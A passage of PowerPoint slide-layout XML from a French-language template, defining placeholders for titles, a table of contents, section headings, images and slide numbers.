        <p15:guide id="2"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_texte_visue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1185" y="1739714"/>
            <a:ext cx="2600325" cy="2933691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="82800" tIns="46800" rIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>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6" name="Espace réservé pour une image  5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E25A8984-73F1-5646-8BE2-9C35ECA83EDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3370599" y="1739504"/>
            <a:ext cx="5408275" cy="2933700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Cliquez sur l'icône pour ajouter une image</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D605C0A9-FD09-5F4C-A239-31E0CE29EBC0}"/>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9"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11" name="Espace réservé du texte 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22204277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ommaire 3 colon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Sommaire</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384823" y="1497115"/>
            <a:ext cx="2700000" cy="3278085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="228600" marR="0" indent="-228600" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst/>
              <a:defRPr sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="360363" indent="-179388">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1200"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="447675" indent="-200025">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:defRPr sz="1100"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="720725" indent="-179388">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:tabLst>
                <a:tab pos="720725" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1100"/>
            </a:lvl4pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre de la partie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sous-titre de partie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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16" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6078875" y="1497115"/>
            <a:ext cx="2700000" cy="3278085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="228600" marR="0" indent="-228600" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
              <a:tabLst/>
              <a:defRPr sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="360363" indent="-179388">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1200"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="447675" indent="-200025">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:defRPr sz="1100"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="720725" indent="-179388">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:tabLst>
                <a:tab pos="720725" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1100"/>
            </a:lvl4pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre de la partie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sous-titre de partie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3222000" y="1497115"/>
            <a:ext cx="2700000" cy="3278085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="228600" marR="0" indent="-228600" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
              <a:tabLst/>
              <a:defRPr sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="360363" indent="-179388">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1200"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="447675" indent="-200025">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:defRPr sz="1100"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="720725" indent="-179388">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:tabLst>
                <a:tab pos="720725" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1100"/>
            </a:lvl4pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre de la partie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sous-titre de partie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402411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ommaire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Sommaire</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631185" y="1497115"/>
            <a:ext cx="8147690" cy="3278085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="228600" marR="0" indent="-228600" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst/>
              <a:defRPr sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="360363" indent="-179388">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1200"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="447675" marR="0" indent="-200025" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst/>
              <a:defRPr sz="1100"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="720725" indent="-179388">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
              <a:tabLst>
                <a:tab pos="720725" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1100"/>
            </a:lvl4pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre de la partie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre de la partie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre de la partie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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a:p>
            <a:pPr marL="447675" marR="0" lvl="2" indent="-200025" algn="l" defTabSz="685800" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sous-titre de partie</a:t>
            </a:r>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32787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1" y="1492250"/>
            <a:ext cx="9144001" cy="3282950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Cliquez sur l'icône pour ajouter une image</a:t>
            </a:r>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1"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2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1013909" y="912882"/>
            <a:ext cx="7841445" cy="441015"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>1. Titre de partie</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266612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3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631185" y="1739714"/>
            <a:ext cx="8147690"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sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="360363" indent="-179388">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1200"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="541338" indent="-180975">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1100"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="720725" indent="-179388">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="720725" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1100"/>
            </a:lvl4pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>NIVEAU 3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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>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a:t>
            </a:r>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6" name="Espace réservé du texte 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"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
        <p:nvSpPr>
          <p:cNvPr id="13" name="Espace réservé du texte 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6647900" y="200024"/>
            <a:ext cx="2217737" cy="250826"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="180000" indent="-180000" algn="r">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1100" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre de partie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Espace réservé du texte 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6647900" y="397458"/>
            <a:ext cx="2217737" cy="250826"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="180000" indent="-180000" algn="r">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:defRPr sz="1000" b="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sous-titre de partie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="390498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6" name="Espace réservé du texte 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"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
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631185" y="1739714"/>
            <a:ext cx="8147690"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sz="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="360363" indent="-179388">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1200"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="541338" indent="-180975">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1100"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="720725" indent="-179388">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="720725" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="1100"/>
            </a:lvl4pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>NIVEAU 3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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2693341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et 3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824" y="1739714"/>
            <a:ext cx="2600325" cy="2933691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>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Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26105172-9325-D643-82B4-51B2D10F8C11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3252508" y="1739714"/>
            <a:ext cx="2600325"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1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13" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B47A7C41-CA0C-7D40-A28B-EB491EC3424F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6166911" y="1739714"/>
            <a:ext cx="2600325"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1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14"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11"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12" name="Espace réservé du texte 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"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
        <p:nvSpPr>
          <p:cNvPr id="15" name="Espace réservé du texte 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6647900" y="200024"/>
            <a:ext cx="2217737" cy="250826"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="180000" indent="-180000" algn="r">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1100" b="1"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Titre de partie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Espace réservé du texte 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6647900" y="397458"/>
            <a:ext cx="2217737" cy="250826"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="180000" indent="-180000" algn="r">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:defRPr sz="1000" b="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Sous-titre de partie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4177930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3 colonn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824" y="1739714"/>
            <a:ext cx="2600325" cy="2933691"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="1100"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>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8" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{813A86EA-B65D-7147-BE1B-2260AE611E03}"/>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Content Placeholder 2">
